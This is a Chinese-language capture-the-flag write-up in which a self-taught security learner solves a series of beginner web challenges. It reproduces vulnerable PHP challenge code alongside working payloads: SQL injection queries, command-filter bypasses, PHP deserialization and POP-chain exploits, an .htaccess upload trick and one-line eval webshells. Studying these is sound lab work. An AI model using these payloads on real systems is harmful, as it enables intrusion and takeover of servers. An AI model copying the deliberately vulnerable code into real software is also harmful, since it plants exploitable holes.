😋大家好，我是YAy_17，是一枚爱好网安的小白，自学ing。 

本人水平有限，欢迎各位大佬指点，一起学习💗，一起进步⭐️。

⭐️此后如竟没有炬火，我便是唯一的光。⭐️

目录

gift_F12

jicao

easy_md5

caidao

include

easyrce

easy_sql

babyrce

Do_you_know_http

ez_unserialize

easyupload1.0

easyupload2.0

easyupload3.0

no_wakeup

PseudoProtocols

error

hardrce

pop

sql

finalrce

hardrce_3

---

很久不学习CTF，很多知识点有点淡忘；还有最后一个phar反序列化，不太会做。

gift_F12

先听听歌吧ovo 查看源代码：

jicao

 <?php 
 highlight_file(__FILE__);
 include 'flag2.php';
 
	if (isset($_GET['name']) && isset($_POST['password'])){
    $name = $_GET['name'];
    $password = $_POST['password'];
    if ($name != $password && md5($name) == md5($password)){
        echo $flag;
    }
    else {
        echo "wrong!";
    }
 
	}
	else {
    echo 'wrong!';
}
?>

考察md5弱类型碰撞：

        弱类型比较的时候，会把0exxxx当作科学计数法，不管后面的值为任何东西，0的任何次幂都为0

一些字符串md5值以0e开头

QNKCDZO
240610708
s878926199a
s155964671a
s21587387a

        数组绕过

md5()函数计算的是一个字符串的哈希值，对于数组则返回false

a[]=1&b[]=2

caidao

直接连蚁剑，翻目录，找flag；

include

传参数file之后，代码审计：

题目提示我们LFI，尝试使用php://filter伪协议读取文件的内容：

尝试使用base64解码，得到答案；

easyrce

<?php
	error_reporting(0);
	highlight_file(__FILE__);
	if(isset($_GET['url'])){
		eval($_GET['url']);
	}
?>

rce，直接命令执行即可，直接传url=system("cat / flllllaaaaaaggggggg");

easy_sql

随便传了一个参数a，但是没反应，看看源代码，发现了在源代码中，存在着提示“参数是wllm”

题目是SQL注入，先判断注入类型。

?wllm=-1' union select 1,database(),3--+

之后就是正常的SQL注入了；

?wllm=-1' union select 1,(select flag from test_tb),3--+

babyrce

 <?php
	error_reporting(0);
	header("Content-Type:text/html;charset=utf-8");
	highlight_file(__FILE__);
	if($_COOKIE['admin']==1) {
    include "../next.php";
	}else
    echo "小饼干最好吃啦！";
?> 小饼干最好吃啦！

提示rasalghul.php，访问一下：

 <?php
	error_reporting(0);
	highlight_file(__FILE__);
	error_reporting(0);
	if (isset($_GET['url'])) {
  	$ip=$_GET['url'];
  	if(preg_match("/ /", $ip)){
      	die('nonono');
  	}
  	$a = shell_exec($ip);
  	echo $a;
}
?> 

正则过滤空格，命令执行，用${IFS}来绕过 (还可以通过%3c %09绕过)

ls${IFS}/

Do_you_know_http

通过Brup来改数据包信息：

继续改X-Forwarded-For

ez_unserialize

看看源代码先：

提示了，看看robots.txt：

访问这个php文件，出现反序列化的代码审计：

 <?php
	error_reporting(0);
	show_source("cl45s.php");	
	class wllm{
    public $admin;
    public $passwd;
    public function __construct(){
        $this->admin ="user";
        $this->passwd = "123456";
    }
    public function __destruct(){
    if($this->admin === "admin" && $this->passwd === "ctf"){
       include("flag.php");
       echo $flag;
    }else{
       echo $this->admin;
       echo $this->passwd;
       echo "Just a bit more!";
        }
    }
}
$p = $_GET['p'];
unserialize($p);
?> 

<?php

class wllm{

     public $admin="admin";

    public $passwd="ctf";

}

$p = new wllm();

var_dump(serialize($p));

?>

O:4:"wllm":2:{s:5:"admin";s:5:"admin";s:6:"passwd";s:3:"ctf";}

easyupload1.0

文件上传：

尝试上传php文件，但是发现失败了，接着改后缀名为jpg，发现还是不行，发现MIME信息还是php的相关信息，尝试改为jpg的MIME头；依然保留php后缀名，发现上传成功：

之后连马，或者命令执行都可！

哎？发现不是正确答案，看看phpinfo()，才发现了正确答案；

easyupload2.0

继续先用上个payload继续打；

哦 不让上传php了，其他的后缀可以先试试；发现php3是不可以的，但是pht还是可以正常上传的！

easyupload3.0

提示使用.htaccess文件上传漏洞：

构造.htaccess文件：

<FilesMatch "jpg">

SetHandler application/x-httpd-php

</FilesMatch>

以上代码，表示将jpg文件解析为php文件；

直接上传该文件，之后上传一张jpg后缀的文件，文件内容就是一句话木马；

上传图片：

用蚁剑直接连接jpg文件；

no_wakeup

 <?php
header("Content-type:text/html;charset=utf-8");
error_reporting(0);
show_source("class.php");

class HaHaHa{
        public $admin;
        public $passwd;
        public function __construct(){
            $this->admin ="user";
            $this->passwd = "123456";
        }
        public function __wakeup(){
            $this->passwd = sha1($this->passwd);
        }
        public function __destruct(){
            if($this->admin === "admin" && $this->passwd === "wllm"){
                include("flag.php");
                echo $flag;
            }else{
                echo $this->passwd;
                echo "No wake up";
            }
        }
    }
$Letmeseesee = $_GET['p'];
unserialize($Letmeseesee);
?> 

绕过wakeup函数即可！

O:6:"HaHaHa":3:{s:5:"admin";s:5:"admin";s:6:"passwd";s:4:"wllm";}

PseudoProtocols

题目提示使用php伪协议；

wllm=php://filter/convert.base64-encode/resource=hint.php

得到上述结果，使用base64解码；得到提示：

访问上述界面，得到：

<?php
	ini_set("max_execution_time", "180");
	show_source(__FILE__);
	include('flag.php');
	$a= $_GET["a"];
	if(isset($a)&&(file_get_contents($a,'r')) === 'I want flag'){
    	echo "success\n";
    	echo $flag;
	}
?> 

大概就是GET方式传参a，a参数利用file_get_contents以只读的方式打开，打开后的内容与I want flag内容一致；

两种方法：

• data://text/plain

data伪协议，此协议需要在allow_url_fopen和allow_url_include全部为ON的状态下才能使用，很常用的数据流构造器，将读取后面base编码字符串后解码的数据作为数据流的输入；

用法：data://text/plain;base64,base64编码字符

payload为：a=data://text/plain,I want flag

• php://input

php://input协议需要在allow_url_include为ON的状态下使用，可以访问请求的原始数据的只读流, 将post请求中的数据作为PHP代码执行。当传入的参数作为文件名打开时，可以将参数设为php://input,同时post想设置的文件内容，php执行时会将post内容当作文件内容。

使用方法：php://input,然后post需要执行的数据

我没打通，我不明白这是为什么....

error

输入id为1：

id为2：

id为1的时候，源代码中存在着提示，单引号闭合；结合题目提示报错注入：

爆表名：

最终爆flag（列名没写，都一样）：

hardrce

首先是判断这个题目对应的PHP版本，发现是php7版本：

附上P神的博客：

一些不包含数字和字母的webshell | 离别歌

无字母数字webshell之提高篇 | 离别歌

详见无数字字母webshell总结；

pop

 <?php

error_reporting(0);
show_source("index.php");

class w44m{

    private $admin = 'aaa';
    protected $passwd = '123456';

    public function Getflag(){
        if($this->admin === 'w44m' && $this->passwd ==='08067'){
            include('flag.php');
            echo $flag;
        }else{
            echo $this->admin;
            echo $this->passwd;
            echo 'nono';
        }
    }
}

class w22m{
    public $w00m;
    public function __destruct(){
        echo $this->w00m;
    }
}

class w33m{
    public $w00m;
    public $w22m;
    public function __toString(){
        $this->w00m->{$this->w22m}();
        return 0;
    }
}

$w00m = $_GET['w00m'];
unserialize($w00m);

?>

该题目中涉及到的魔术方法有两个toString和destruct，构造pop链的关键是紧盯魔术方法，找到pop链的头部和尾部，可以看到GET方式传参w00m，也就是pop链的头部，然后就是尾部，尾部就是能够达到恶意攻击的地方，在上述的题目中，清晰可见：w44m类中存在着一个方法GETflag方法，便可输出最终的flag。因此这也是我们的pop链的尾部；

class w44m{

    private $admin = 'aaa';
    protected $passwd = '123456';

    public function Getflag(){
        if($this->admin === 'w44m' && $this->passwd ==='08067'){
            include('flag.php');
            echo $flag;
        }else{
            echo $this->admin;
            echo $this->passwd;
            echo 'nono';
        }
    }
}

w44m类中两个变量的属性并不是共有属性，而是私有属性和保护属性，无法在创建对象的时候，进行赋值；因此我们就直接在类中进行赋值；

接下来思考，如何去调用w44m类中的Getflag方法呢？我们会发现在w33m类中存在tostring方法，可以调用某一个类中的某一个方法。因此我们可以w33m类中的两个变量w00m赋值为w44m类名，w22m赋值为Getflag方法；那么接下来就是去思考怎么去调用w33m类呢？destruct会在对象被销毁时调用，因此只要给w22m类中的w00m变量一个类w33m就可以实现调用；

因此最终的pop链如下：

<?php
class w44m{
    private $admin = 'w00m';
    protected $passwd = '08067';
}

class w22m{
    public $w00m;
}

class w33m{
    public $w00m;
    public $w22m;
}
$a = new w22m();
$a->w00m = new w33m();
$a->w00m->w00m = new w44m();
$a->w00m->w22m = "Getflag";
echo urlencode(serialize($a));
?>

sql

随便输入了id=1，但是还是上述界面，看一下源代码：发现参数为wllm；

注入过程中发现“--+”以及空格被绕过，注释的话使用#编码绕过即可，空格的话用/**/来绕过。

接下来就是爆数据库名，表名、列明以及最终的数据；

爆出数据库名之后，在查询表名的时候，发现=也被过滤了，可以用like来代替；

在获取最终的数据的时候，发现被截断了：

但是使用substr()函数的时候，发现该函数还被过滤了。还可以用mid函数：

最终可以得到flag

finalrce

<?php
highlight_file(__FILE__);
if(isset($_GET['url']))
{
    $url=$_GET['url'];
    if(preg_match('/bash|nc|wget|ping|ls|cat|more|less|phpinfo|base64|echo|php|python|mv|cp|la|\-|\*|\"|\>|\<|\%|\$/i',$url))
    {
        echo "Sorry,you can't use this.";
    }
    else
    {
        echo "Can you see anything?";
        exec($url);
    }
}

该题目利用了写文件的方法；但是题目中过滤了“>”符号，涉及到知识盲区了，还可以用tee命令：

tee命令用于将标准输入复制到每个指定文件，并显示到标准输出。tee指令会从标准输入设备读取数据，将其内容输出到标准输出设备，同时保存成文件。

payload：url=l``s / | tee a.txt

发现两个flag可疑的地方；看到题目中过滤la，尝试访问/flllllaaaaaaggggggg，“*”号被过滤，还可以用“？”

?url=ca``t /flllll????????????? | tee a.txt

成功访问到flag；

hardrce_3

 <?php
header("Content-Type:text/html;charset=utf-8");
error_reporting(0);
highlight_file(__FILE__);
if(isset($_GET['wllm']))
{
    $wllm = $_GET['wllm'];
    $blacklist = [' ','\^','\~','\|'];
    foreach ($blacklist as $blackitem)
    {
        if (preg_match('/' . $blackitem . '/m', $wllm)) {
        die("小伙子只会异或和取反？不好意思哦LTLT说不能用！！");
    }}
if(preg_match('/[a-zA-Z0-9]/is',$wllm))
{
    die("Ra'sAlGhul说用字母数字是没有灵魂的！");
}
echo "NoVic4说：不错哦小伙子，可你能拿到flag吗？";
eval($wllm);
}
else
{
    echo "蔡总说：注意审题！！！";
}
?> 

不能用异或和取反了，还可以用自增：

<?php

$_=''.[];
$__=$_[$___];
$_=$__;
$___=$__;
$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;
$___.=$_;
$___.=$_;
$_=$__;
$_++;$_++;$_++;$_++;
$___.=$_;
$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;
$___.=$_;
$_++;$_++;
$___.=$_;
$____='_';
$_=$__;
$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;
$____.=$_;
$_=$__;
$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;
$____.=$_;
$_=$__;
$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;
$____.=$_;$_++;$____.=$_;
$_=$$____;
$___($_[_]);

但是不能执行system()；发现phpinfo中的disabled_function过滤了很多函数：

命令执行函数不能用了；没有过滤file_put_contents()，写马再连；

_=file_put_contents('1.php','<?php eval($_POST[x]);?>');